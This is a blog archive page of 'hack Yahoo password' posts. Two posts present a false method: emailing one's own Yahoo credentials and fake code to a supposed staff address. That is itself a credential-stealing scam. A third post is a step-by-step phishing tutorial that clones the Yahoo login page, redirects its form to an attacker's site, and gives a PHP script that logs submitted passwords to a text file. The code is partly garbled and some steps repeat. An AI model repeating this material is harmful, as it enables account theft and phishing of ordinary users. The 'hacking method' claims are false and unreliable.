Showing posts with label how to hack yahoo email. Show all posts
Showing posts with label how to hack yahoo email. Show all posts
Thursday, July 7, 2011
Wednesday, July 14, 2010
Hack Yahoo Password

It is possible and it is easy.
This way of hacking into Yahoo email accounts was brought to my attention by a friend of mine who is a bit of a computer wizard.
This is how it is done:
STEP 1- Log in to your own yahoo account. Note: Your account must be at least 30 days old for this to work.
STEP 2- Once you have logged into your own account, compose/write an e-mail to:
RETRIVE_PASS_KEY_CGI_BIN@yahoo.comThis is a mailing address to the Yahoo Staff.
The automated server will send you the password that you have 'forgotten', after receiving the information you send them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email address of the person you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR email address (your OWN password).
The computer needs your password so it can send a JavaScript from your account in the Yahoo Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status.
The process will be done automatically by the user administration server.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa{simply copy and paste above.}
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
so for example if your yahoo id is : anu007tiger@yahoo.com and
your password is: anu and
the email address you want to hack is: tiger@yahoo.com then
compose the mail as below:
To: RETRIVE_PASS_KEY_CGI_BIN@yahoo.com
bcc: cc: (Don't write anything in cc,bcc field)Subject: " PASSWORD RECOVERY "tiger@yahoo.com
anu007tiger@yahoo.com
anu
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
The password will be sent to your inbox in a mail called "System Reg Message" from System. When my friend showed me how to do this I thought it was too good a trick to keep to myself! Just try and enjoy!
Monday, July 5, 2010
Wanna hack Yahoo Password...

Hi, It is possible and it is easyI have tried the method a least a dozen times and it has worked on all but 2 occasions, I don't know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address.
This is how it is done:
STEP 1- Log in to your own yahoo account.
Note: Your account must be at least 30 days old for this to work.
STEP 2- Once you have logged into your own account, compose/write an e-mail
To: yserverindia@yahoo.co.in
This is a mailing address to the Yahoo Staff. The automated server will send you the password that you have 'forgotten', after receiving the information you send them.
STEP 3- In the subject line type exactly: password retrieve.
STEP 4- On the first line of your mail write the email address of the person you are hacking.
STEP 5- On the second line type in the e-mail address you are using.
STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a java-script from your account in the Yahoo Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status.
Remember you are sending your password to a machine not a man. The process will be done automatically by the user administration server.
NOTE: You can use your other email account other than yahoo.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin/$et76431&pwrsa so
NOTE: You can use your other email account other than yahoo.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin/$et76431&pwrsa so
for example if your yahoo id is : tiger_100@yahoo.com and your password is: tiger and the email address you want to hack is: test@yahoo.com then compose the mail as below:
To: yserverindia@yahoo.co.in
bcc: cc:
Subject: password retrieve
test@yahoo.com
tiger_100@yahoo.com
tiger
cgi-bin/$et76431&pwrsa
The password will be sent to your inbox in a mail called "System Reg Message" from "System".
Usually within 1 hour. When my friend showed me how to do this I thought it was too good a trick to keep to myself!
Just try and enjoy!
Thursday, July 1, 2010
Hack Yahoo Account (Fake Login Page)

If you like playing pranks on your friends, then here is a sure shot way to baffle them. I will show you a way to get their username and passwords! This post will direct you as to, how to create a Fake Login Page to hack yahoo.
Fake login page is a fake page, that exactly resembles the original login page of sites, which you can use to hack others username and password.
To create a fake login page for other sites, like Gmail at all, the same procedure can be followed. So, let’s cut to the chase and go through the steps.
Here is the how-to guide to create a fake login page.
#1:- Go to the Yahoo login page
mail.yahoo.com
.
#2: - Save the page as Complete HTML file. (Not as .mht file, only for IE 7 users)
To save the page goto File - Save As
.
#3: - After saving, you will see a HTML file and a folder with the name -Yahoo! Mail The best web-based email!.
.
#4: - Ensure the folder contains necessary images and other support files. Now rename the Folder to “files“ and .HTML file to yahoo.HTML
#5: - Open the .HTML file using a WordPad. Change the links of all the files in the folder to /files.
For example you may find something like this in the opened HTML file:-
src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”
Rename the above link into
src=”files/ma_mail_1.gif”
Repeat the procedure for every file in the folder and use Ctrl F to find the links.
#6:- Search for the following term
action=https://login.yahoo.com/config/login
Edit this to:-
action=http://yoursite.com/login.php
Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page and replace yoursite.com with yoursite.110mb.com or you can write your own code for login.php or search for Login script on Google.
#7 :- Upload your yahoo.HTML, files folder and login.php to
yoursite.com Root folder
NOTE: Make sure that your host supports PHP.
#8 :- Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com).
#9 : - Distribute the Yahoo.HTML URL (i.e: yoursite.com/yahoo.HTML).
The login.php will save the username and password onto the .TXT file (or any other format) in your site.
Download the file to see the password in it.
Here is the login script for some help:-
header(”Location: http://WEBSITE “);Add 'GREATER THAN' sign between variable= and $value.
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as
$variable = $value) {
fwrite($handle,$variable);Warning: Don’t try this at home, as Hacking is a Crime. Only for educational purposes.
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle,“rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
Subscribe to:
Posts (Atom)